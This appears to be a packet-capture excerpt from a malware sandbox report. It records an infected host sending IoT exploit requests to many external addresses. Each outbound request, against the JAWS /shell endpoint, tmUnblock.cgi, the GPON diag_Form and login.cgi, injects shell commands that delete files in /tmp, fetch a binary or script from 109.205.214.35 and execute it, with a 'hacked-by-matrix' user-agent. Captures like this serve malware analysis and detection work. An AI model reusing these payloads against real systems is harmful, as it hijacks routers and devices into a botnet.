                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1594192.168.2.135192052.2.150.18680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.262423038 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:21.776236057 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:22.384228945 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1595192.168.2.133656444.198.48.22380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.262614012 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:21.565466881 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:21.659384966 CET134INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1596192.168.2.1359926190.218.8.12380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.339405060 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:22.257265091 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:22.434931040 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:22 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1597192.168.2.135655089.212.238.18580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.368324041 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:25.613615036 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:25.799635887 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:25 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1598192.168.2.1341878172.66.214.628080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.641530991 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:22.124241114 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1599192.168.2.1340718172.66.200.628080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.641554117 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:22.124237061 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1600192.168.2.1343810172.67.113.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.765420914 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1601192.168.2.1340980172.65.199.498080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.765562057 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1602192.168.2.135568242.155.9.179443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.769506931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1603192.168.2.13495985.218.232.132443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.769565105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1604192.168.2.1335004109.201.115.44443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.769591093 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1605192.168.2.1348246172.67.154.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.854255915 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:21.984232903 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1606192.168.2.1348208172.67.154.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.924086094 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1607192.168.2.1359296172.66.3.1528080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.924097061 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1608192.168.2.1360830185.81.4.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:22.023562908 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:23:22.219181061 CET550INHTTP/1.0 401 Access Denied
                                                        WWW-Authenticate: Basic realm="APPing - app1.apping.it - Restricted access"
                                                        Content-Length: 0
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 69 6e 61 6c 2f 2f 45 4e 27 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0d 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0d 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0d 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0d 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0d 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html '-//W3C//DTD HTML 4.01 Final//EN'><html><head><title>401 Authorization Required</title></head><body><h1>Authorization Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1609192.168.2.1357600212.227.89.6380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:22.047050953 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:22.219782114 CET778INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:22 GMT
                                                        Server: Apache
                                                        Content-Length: 620
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 30 20 2d 20 42 61 64 20 72 65 71 75 65 73 74 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 30 20 2d 20 42 61 64 20 72 65 71 75 65 73 74 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 56 65 72 62 69 6e 64 75 6e 67 73 61 75 66 62 61 75 20 6e 69 63 68 74 20 6d 26 6f 75 6d 6c 3b 67 6c 69 63 68 20 6f 64 65 72 20 53 65 72 76 65 72 20 61 6e 74 77 6f 72 74 65 74 20 6e 69 63 68 74 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 400 - Bad request </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 400 - Bad request </h1> <p style="font-size:0.8em;"> Verbindungsaufbau nicht m&ouml;glich oder Server antwortet nicht. </p> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1610192.168.2.134405089.90.202.24480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:22.306256056 CET313OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:25.356228113 CET313OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:31.501370907 CET313OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
